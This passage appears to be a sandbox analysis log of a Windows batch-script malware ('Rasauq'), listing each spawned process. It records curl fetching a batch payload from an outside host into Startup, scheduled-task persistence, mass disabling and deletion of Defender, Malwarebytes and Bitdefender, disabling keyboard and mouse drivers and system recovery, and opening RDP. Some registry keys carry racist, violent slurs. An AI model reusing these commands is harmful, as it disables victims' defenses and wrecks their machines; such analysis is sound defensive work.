        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\system32\curl.exe
    curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:1792
- - C:\Windows\system32\curl.exe
    curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:3544
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:5540
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:4712
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3908
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:4232
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:4432
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:1536
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:4792
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:4700
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:5064
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:280
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:296
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:5912
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:5360
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5856
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:4760
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:4684
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:1988
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:2952
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:4716
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:4076
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:3152
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:3816
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:3812
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:3460
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:4520
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:4216
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5612
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5720
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1516
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:604
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:852
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:2604
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:2564
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:1696
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:4912
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:1032
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4988
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:5868
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:6100
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:5896
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3096
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3320
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6008
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5148
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:6124
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2996
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:4380
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:3896
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4112
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1920
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:3392
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:1724
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:3532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3328
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:232
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4280
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5932
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5536
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5648
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2804
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      Launches sc.exe
      PID:3016
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:3808
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:864
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:3968
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      Launches sc.exe
      PID:6088
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      Launches sc.exe
      PID:3636
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:2756
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:5468
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:4392
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:2892
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:1056
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:5420
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:5268
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:4360
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:3848
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:4188
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3304
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1828
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6000
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6028
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4120
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4460
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4916
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3464
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1224
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      Launches sc.exe
      PID:4484
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:4540
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:4420
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:4604
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      Launches sc.exe
      PID:2368
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      Launches sc.exe
      PID:4412
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:4468
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:5084
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:4920
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      Launches sc.exe
      PID:5092
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      Launches sc.exe
      PID:4700
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:272
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      Launches sc.exe
      PID:288
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:280
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      Launches sc.exe
      PID:3300
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      Launches sc.exe
      PID:3080
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:924
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:5936
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:5912
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:5360
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:5856
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:4760
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:6136
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:4736
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:4808
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:3604
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:868
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:3940
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:508
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4712
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:4520
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:5008
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:4148
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:2728
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:3524
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:4404
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      Launches sc.exe
      PID:5704
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      Launches sc.exe
      PID:3696
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:3552
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:3648
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4028
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3788
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5036
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4992
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5340
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2764
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:3800
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3988
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:5372
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:5572
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:5212
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:5952
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4012
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5812
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1516
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:604
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:852
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2604
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4844
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:316
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4416
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3504
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      Suspicious use of AdjustPrivilegeToken
      PID:1132
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      Suspicious use of AdjustPrivilegeToken
      PID:3584
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:1032
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:4988
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:5868
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:6100
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:5496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:5560
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:3368
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5772
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5676
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5000
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:6008
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:6124
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2996
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4380
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3896
  - - C:\Windows\system32\reg.exe
